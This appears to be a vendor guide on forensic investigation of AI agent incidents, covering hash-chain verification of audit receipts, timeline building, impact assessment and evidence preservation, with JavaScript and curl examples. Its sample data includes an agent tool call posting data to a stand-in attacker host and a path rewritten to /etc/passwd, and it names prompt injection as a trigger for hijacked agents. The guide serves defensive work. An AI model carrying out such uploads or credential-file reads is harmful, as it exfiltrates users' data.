Post-incident forensics for AI agents

Authensor

After an AI agent incident, you need to reconstruct exactly what happened: what the agent did, in what order, what triggered the behavior change, and what impact it had. This is post-incident forensics, and the quality of your investigation depends on the quality of your audit trail.

The receipt chain as evidence

Every action the agent attempted is recorded in the receipt chain. Each receipt includes:

  • Timestamp (when the action was evaluated)
  • Tool name and arguments (what the agent tried to do)
  • Policy decision and reason (what the safety system decided)
  • Content scan results (any threats detected)
  • Principal identity (which user and agent)
  • Hash chain links (proof of integrity)
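
Before analyzing an export, it can help to confirm that each receipt actually carries the fields listed above. The following is a minimal sketch; the field names (`timestamp`, `tool`, `args`, `decision`, `reason`, `scan`, `principal`, `prevHash`, `hash`) are assumptions chosen to mirror the list, not a documented schema, so adjust them to whatever your export contains.

```javascript
// Assumed field names, one or more per item in the list above.
// These are illustrative, not a documented receipt schema.
const REQUIRED_FIELDS = [
  'timestamp', // when the action was evaluated
  'tool',      // tool name
  'args',      // tool arguments
  'decision',  // policy decision
  'reason',    // reason for the decision
  'scan',      // content scan results
  'principal', // which user and agent
  'prevHash',  // hash chain link to the previous receipt
  'hash',      // this receipt's own hash
];

// Returns the names of required fields that are absent from a receipt.
function missingReceiptFields(receipt) {
  return REQUIRED_FIELDS.filter((field) => !(field in receipt));
}

// A deliberately incomplete receipt (hypothetical values).
const incomplete = {
  timestamp: '2025-01-15T10:00:00Z',
  tool: 'fs.read',
  args: { path: '/srv/docs/faq.md' },
  decision: 'allow',
  reason: 'matched read-only rule',
  prevHash: 'GENESIS',
  hash: 'abc123',
};

console.log(missingReceiptFields(incomplete)); // [ 'scan', 'principal' ]
```

Receipts with missing fields are worth flagging early, because later steps (timeline, impact, control review) rely on them.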

Step 1: Verify chain integrity

Before trusting the audit data, verify the hash chain:

curl "https://control-plane/api/receipts/verify?session_id=sess_abc123"

If the chain is intact, the records have not been tampered with since they were created. If verification reports a break, identify which receipts were modified, and treat every receipt at or after the first break as unverified until you can corroborate it from another source.
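
To make the idea concrete, here is a sketch of what chain verification might do when run locally against exported receipts. The hashing scheme is an assumption (SHA-256 over the previous hash plus a JSON serialization of the payload), as are the `prevHash` and `hash` field names and the `GENESIS` marker; the real control plane may use a different scheme, so treat this as an illustration of the technique rather than a replacement for the verify endpoint.

```javascript
const { createHash } = require('node:crypto');

const GENESIS = 'GENESIS'; // assumed marker for the first receipt's prevHash

// Assumed scheme: SHA-256 over the previous hash plus the JSON payload.
// A production scheme would need a canonical serialization; JSON.stringify
// depends on key insertion order.
function computeHash(prevHash, payload) {
  return createHash('sha256')
    .update(prevHash)
    .update(JSON.stringify(payload))
    .digest('hex');
}

// Helper used only to build sample data for this sketch.
function appendReceipt(chain, payload) {
  const prevHash = chain.length ? chain[chain.length - 1].hash : GENESIS;
  chain.push({ ...payload, prevHash, hash: computeHash(prevHash, payload) });
  return chain;
}

// Returns the index of the first receipt that fails verification, or -1.
function findFirstBreak(receipts) {
  let expectedPrev = GENESIS;
  for (let i = 0; i < receipts.length; i++) {
    const { prevHash, hash, ...payload } = receipts[i];
    const linkOk = prevHash === expectedPrev;
    const hashOk = hash === computeHash(prevHash, payload);
    if (!linkOk || !hashOk) return i;
    expectedPrev = hash;
  }
  return -1;
}

const chain = [];
appendReceipt(chain, { id: 'rec_1', tool: 'fs.read', args: { path: '/tmp/a' } });
appendReceipt(chain, { id: 'rec_2', tool: 'fs.read', args: { path: '/tmp/b' } });
appendReceipt(chain, { id: 'rec_3', tool: 'http.post', args: { url: 'https://example.com' } });

console.log(findFirstBreak(chain)); // -1 (intact)
chain[1].args.path = '/etc/passwd'; // simulate tampering with rec_2
console.log(findFirstBreak(chain)); // 1
```

The returned index marks where trust ends: receipts before it still verify, while the receipt at that index and everything after it need independent corroboration.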

Step 2: Build the timeline

Export the receipts and build a chronological timeline:

curl "https://control-plane/api/receipts?session_id=sess_abc123&format=timeline"

Look for the inflection point: the moment the agent's behavior changed. Common inflection patterns:

  • After processing external content: Suggests indirect prompt injection
  • After a specific user message: Suggests direct prompt injection
  • After a tool response: Suggests a compromised tool or poisoned data
  • Gradual drift with no clear trigger: Suggests context accumulation or a model-level issue
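
One rough way to locate a candidate inflection point is to treat the first few receipts as a baseline and flag the first later receipt that was denied or used a tool not seen in that baseline. This is a heuristic sketch, not the product's method; the `timestamp`, `tool`, and `decision` fields and the `'deny'` value are assumed names, and the baseline size is something you would pick by inspecting the session.

```javascript
// Sort a copy of the receipts chronologically (ISO 8601 timestamps assumed).
function buildTimeline(receipts) {
  return [...receipts].sort(
    (a, b) => Date.parse(a.timestamp) - Date.parse(b.timestamp)
  );
}

// Heuristic: the first receipt after the baseline window that was denied
// or that calls a tool absent from the baseline window.
function findInflection(timeline, baselineSize) {
  const baselineTools = new Set(
    timeline.slice(0, baselineSize).map((r) => r.tool)
  );
  for (let i = baselineSize; i < timeline.length; i++) {
    const r = timeline[i];
    if (r.decision === 'deny' || !baselineTools.has(r.tool)) {
      return { index: i, receipt: r, previous: timeline[i - 1] ?? null };
    }
  }
  return null; // no candidate found; consider gradual drift
}

// Hypothetical export, deliberately out of order.
const exported = [
  { id: 'rec_3', timestamp: '2025-01-15T10:00:09Z', tool: 'web.fetch', decision: 'allow' },
  { id: 'rec_1', timestamp: '2025-01-15T10:00:00Z', tool: 'fs.read', decision: 'allow' },
  { id: 'rec_4', timestamp: '2025-01-15T10:00:12Z', tool: 'http.post', decision: 'allow' },
  { id: 'rec_2', timestamp: '2025-01-15T10:00:05Z', tool: 'fs.read', decision: 'allow' },
];

const timeline = buildTimeline(exported);
const inflection = findInflection(timeline, 3);
console.log(inflection.receipt.id);    // rec_4
console.log(inflection.previous.tool); // web.fetch
```

In this sample the receipt just before the candidate is an external fetch, which matches the first pattern in the list above. A human still has to confirm the candidate, since a new tool can also appear for legitimate reasons.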

Step 3: Analyze the trigger

Examine the receipt immediately before the behavior change. If the agent processed external content, scan that content retroactively:

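// 'rec_inflection_point' is a placeholder: use the id of the receipt just before the behavior change
const triggerReceipt = receipts.find(r => r.id === 'rec_inflection_point');
if (!triggerReceipt) throw new Error('Trigger receipt not found in the exported receipts');
// Re-scan the content to check for injection patterns that were not caught at runtime
const scan = aegis.scan(triggerReceipt.args.content);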

Step 4: Assess impact

From the inflection point forward, catalog every action:

  • What tools were called?
  • What data was accessed?
  • What data was sent to external systems?
  • What changes were made to files, databases, or configurations?
  • Were other agents or systems affected?
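
The first few questions above can be partly answered mechanically from the receipts. The sketch below tallies allowed tool calls from the inflection point onward and collects the hosts that received outbound requests. It assumes hypothetical fields (`tool`, `decision`, `args.url`) and assumes that only receipts with `decision === 'allow'` correspond to actions that actually ran.

```javascript
// Summarize what ran from the inflection point forward.
// Field names and the 'allow' decision value are assumptions.
function summarizeImpact(timeline, inflectionIndex) {
  const toolCounts = {};
  const externalHosts = new Set();
  let blocked = 0;

  for (const r of timeline.slice(inflectionIndex)) {
    if (r.decision !== 'allow') {
      blocked += 1; // attempted but stopped by policy
      continue;
    }
    toolCounts[r.tool] = (toolCounts[r.tool] || 0) + 1;
    if (r.args && typeof r.args.url === 'string') {
      try {
        externalHosts.add(new URL(r.args.url).hostname);
      } catch {
        externalHosts.add(r.args.url); // keep malformed values for review
      }
    }
  }
  return { toolCounts, externalHosts: [...externalHosts], blocked };
}

// Hypothetical timeline; index 1 is the inflection point.
const sampleTimeline = [
  { id: 'rec_1', tool: 'fs.read', decision: 'allow', args: { path: '/srv/docs/faq.md' } },
  { id: 'rec_2', tool: 'http.post', decision: 'allow', args: { url: 'https://attacker.example/upload' } },
  { id: 'rec_3', tool: 'http.post', decision: 'deny', args: { url: 'https://attacker.example/upload' } },
  { id: 'rec_4', tool: 'fs.write', decision: 'allow', args: { path: '/srv/config.yaml' } },
];

console.log(summarizeImpact(sampleTimeline, 1));
// { toolCounts: { 'http.post': 1, 'fs.write': 1 },
//   externalHosts: [ 'attacker.example' ],
//   blocked: 1 }
```

A summary like this is a starting point for the catalog. Whether other agents or systems were affected usually cannot be read from one session's receipts and needs checking in those systems directly.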

Step 5: Identify control failures

For each harmful action after the inflection point, ask:

  • Did the policy engine allow it? If so, the policy has a gap.
  • Did Aegis miss the injection? If so, add new detection patterns.
  • Did Sentinel detect the anomaly? If so, was the alert acted on?
  • Was the kill switch available? If so, why was it not triggered sooner?
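
The four questions above can be turned into a small checklist function so that every incident is reviewed the same way. Everything in this sketch is hypothetical: the shape of the `incident` object, its field names, and the wording of the findings are illustrative assumptions, and the inputs would be assembled by hand from receipts, scan results, and alert history.

```javascript
// Turn the control-failure questions into findings.
// The incident object shape is an assumption made for this sketch.
function reviewControls(incident) {
  const findings = [];

  // Policy engine: any harmful action that was allowed points to a gap.
  const allowed = incident.harmfulReceipts.filter((r) => r.decision === 'allow');
  if (allowed.length > 0) {
    findings.push(`policy gap: ${allowed.length} harmful action(s) allowed`);
  }

  // Content scanning: no threats recorded at runtime for the trigger content.
  if (incident.runtimeThreats.length === 0) {
    findings.push('detection miss: trigger content passed the runtime scan');
  }

  // Anomaly detection and response timing.
  if (incident.alertRaisedAt === null) {
    findings.push('anomaly not detected');
  } else if (incident.killSwitchAt === null) {
    findings.push('alert raised but kill switch never triggered');
  } else {
    const delayMs = Date.parse(incident.killSwitchAt) - Date.parse(incident.alertRaisedAt);
    findings.push(`response delay: ${delayMs / 1000}s between alert and kill switch`);
  }
  return findings;
}

const findings = reviewControls({
  harmfulReceipts: [
    { id: 'rec_2', decision: 'allow' },
    { id: 'rec_3', decision: 'deny' },
  ],
  runtimeThreats: [],
  alertRaisedAt: '2025-01-15T10:00:20Z',
  killSwitchAt: '2025-01-15T10:05:20Z',
});

console.log(findings);
// [ 'policy gap: 1 harmful action(s) allowed',
//   'detection miss: trigger content passed the runtime scan',
//   'response delay: 300s between alert and kill switch' ]
```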

Preserving evidence

During an investigation:

  • Lock the receipt chain (prevent accidental deletion)
  • Export receipts to immutable storage
  • Capture Sentinel metric snapshots
  • Save the policy file version that was active during the incident
  • Record the MCP server tool descriptions at the time

This evidence may be needed for regulatory reporting, customer communication, or legal proceedings.
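
When exporting evidence, recording a digest for each artifact lets you show later that the preserved copies are unchanged. The sketch below builds a simple manifest with a SHA-256 digest per artifact using Node's built-in `crypto` module. The artifact names, the manifest layout, and the `buildManifest` helper are illustrative assumptions; storing the manifest and artifacts in immutable storage is left to your own tooling.

```javascript
const { createHash } = require('node:crypto');

// Build a manifest with a byte length and SHA-256 digest per artifact.
// artifacts: array of { name, content } where content is a string.
function buildManifest(artifacts, capturedAt) {
  return {
    capturedAt,
    entries: artifacts.map(({ name, content }) => ({
      name,
      bytes: Buffer.byteLength(content, 'utf8'),
      sha256: createHash('sha256').update(content, 'utf8').digest('hex'),
    })),
  };
}

// Hypothetical artifacts; in practice these would be read from the exports.
const manifest = buildManifest(
  [
    { name: 'receipts.json', content: '[]' },
    { name: 'policy.yaml', content: 'rules: []\n' },
  ],
  '2025-01-15T11:00:00Z'
);

console.log(JSON.stringify(manifest, null, 2));
```

Re-running the same function over the stored artifacts and comparing digests gives a quick integrity check before the evidence is handed to a regulator, customer, or legal team.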
